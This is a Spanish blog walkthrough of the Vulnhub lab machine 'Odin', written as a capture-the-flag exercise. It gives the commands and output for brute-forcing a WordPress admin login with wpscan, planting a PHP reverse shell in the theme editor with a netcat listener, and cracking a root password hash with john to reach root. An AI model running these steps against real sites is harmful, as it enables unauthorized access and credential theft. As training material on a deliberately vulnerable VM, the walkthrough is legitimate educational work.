[VULNHUB] Odin

Hoy vamos a hackear la maquina de Vulnhub llamada Odin. Podeis descargarla desde el siguiente enlace: Odin

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos. 

> nmap -A -p- 192.168.1.37                                                   
                                                                             
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-09 12:07 CET
Nmap scan report for osboxes.home (192.168.1.37)
Host is up (0.00087s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.5.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: vikingarmy – Just another Joomla site

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.87 seconds
Vemos que solo tiene abierto el puerto 80, y que al parecer es un Wordpress. Ejecutamos wpscan para hacer bruteforce a la cuenta de admin. 

> wpscan --url http://odin --passwords /usr/share/wordlists/rockyou.txt --usernames admin                                                               
   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://odin/ [192.168.1.37]
[+] Started: Wed Dec  9 12:32:02 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://odin/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss

[+] Enumerating All Plugins (via Passive Methods)

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / qwerty                                                      
                                                                                
      
Trying admin / ashley Time: 00:00:00 <                                          
                                            
[!] Valid Combinations Found:
 | Username: admin, Password: qwerty

[+] Requests Done: 103
[+] Cached Requests: 7
[+] Data Sent: 22.608 KB
[+] Data Received: 1.223 MB
[+] Memory used: 218.113 MB
[+] Elapsed time: 00:00:15
Vemos que encuentra la password! Accedemos a http://odin/wp-admin y nos logueamos usando los credenciales obtenidos. Vamos a Appearance -> Theme Editor y seleccionamos el Main Index Template (index.php). Preparamos nuestra webshell... 

> cp /usr/share/webshells/php/php-reverse-shell.php .
> mv php-reverse-shell.php shelly.php
> nano shelly.php #Modificamos puerto/IP
Ponemos nc a la escucha: 

> nc -nlvp 1234
listening on [any] 1234 ...
Copiamos nuestra webshell en el index.php del wordpress y hacemos clic en el boton Update File. Si todo ha ido bien tendremos una low shell :)

Low Shell


> nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.37] 34514
Linux osboxes 5.4.0-26-generic #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux
 06:44:59 up 38 min,  0 users,  load average: 0.04, 0.35, 1.19
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Miramos el fichero wp-config.php para ver si tiene algo interesante. 

www-data@osboxes:/var/www/html$ cat wp-config.php
...SNIP...
root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160r
v9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
...SNIP...
Vemos que abajo del todo tiene la supuesta password de root... La copiamos en nuestra maquina al fichero tocrack.txt quedando asi: root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01 Y usamos john y el diccionario rockyou.txt para ver si obtenemos la password. 

> john --wordlist=/usr/share/wordlists/rockyou.txt /home/sml/tocrack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jasmine          (root)
1g 0:00:00:00 DONE (2020-12-09 12:52) 9.090g/s 2327p/s 2327c/s 2327C/s 
123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Vemos que la pass es jasmine.

Privilege Escalation

Ya solo nos queda loguearnos como root con la pass que crackeada. :) 

www-data@osboxes:/var/www/html$ su root
Password: jasmine

root.txt


root@osboxes:/var/www/html# cd /root
root@osboxes:~# ls -la
ls -la
total 48
drwx------  7 root root 4096 Dec  9 06:07 .
drwxr-xr-x 23 root root 4096 Jul  5 22:43 ..
drwx------  2 root root 4096 Jun 24 17:24 .aptitude
-rw-------  1 root root    1 Dec  4 15:57 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
-rw-r--r--  1 root root  109 Dec  5 08:34 bjorn
drwx------  6 root root 4096 Dec  4 15:36 .cache
drwx------  3 root root 4096 Dec  4 15:36 .config
drwx------  3 root root 4096 Dec  4 15:36 .dbus
drwx------  3 root root 4096 Dec  4 15:36 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root    4 Dec  9 06:07 .vboxclient-display-svga.pid
root@osboxes:~# cat bjorn
cσηgÑαтυℓαтιση
Have a nice day!
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=

End

Y con esto ya seriamos root de la maquina.